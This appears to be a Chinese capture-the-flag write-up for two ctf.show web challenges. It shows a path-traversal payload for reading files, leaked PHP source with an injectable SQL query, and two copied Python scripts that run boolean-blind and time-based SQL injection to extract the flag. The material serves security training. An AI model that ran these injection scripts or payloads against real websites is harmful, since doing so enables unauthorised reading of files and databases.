web486

可以扫目录,发现位于上级目录的flag.php。而URL的action参数为一任意文件读取。

payload:index.php?action=../flag

web487

action=../index查看源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!--?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-03-08 15:43:51
# @Last Modified by:   h1xa
# @Last Modified time: 2021-03-08 22:30:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

include('render/render_class.php');
include('render/db_class.php');



$action=$_GET['action'];
if(!isset($action)){
	header('location:index.php?action=login');
	die();	
}

if($action=='check'){
	$username=$_GET['username'];
	$password=$_GET['password'];
	$sql = "select id from user where username = md5('$username') and password=md5('$password') order by id limit 1";
	$user=db::select_one($sql);
	if($user){
		templateUtil::render('index',array('username'=-->

这个没看懂,直接copy别人的python注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import string
url="http://b77de2aa-7d2e-4c6e-9b5f-4772a706992a.challenge.ctf.show/index.PHP?action=check&username=admin1&password=1') or "
s=string.digits+string.ascii_lowercase+"{-}"
flag=''
for i in range(1,40):
	print(i)
	for j in s:
		#data="if((select substr(group_concat(table_name),{0},1) from information_schema.tables where table_schema=database())='{1}',1,0)%23".format(i,j)
		#data="if((select substr(group_concat(column_name),{0},1) from information_schema.columns where table_name='flag')='{1}',1,0)%23".format(i,j)
		data="if((select substr(flag,{0},1) from flag )='{1}',1,0)%23".format(i,j)
		u=url+data
		#print(u)
		r=requests.get(u)
		if "admin" in r.text:
			flag+=j
			print(flag)
			break

又:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests

url = "http://b77de2aa-7d2e-4c6e-9b5f-4772a706992a.challenge.ctf.show/index.php?action=check&username=yn8rt&password=1') or "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 126

    while head < tail:
        mid = (head + tail) >> 1
        payload = f"if(ascii(substr((select flag from flag),{i},1))>{mid},sleep(2),0)+--+"
        try:
            r = requests.get(url + payload, timeout=0.5)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)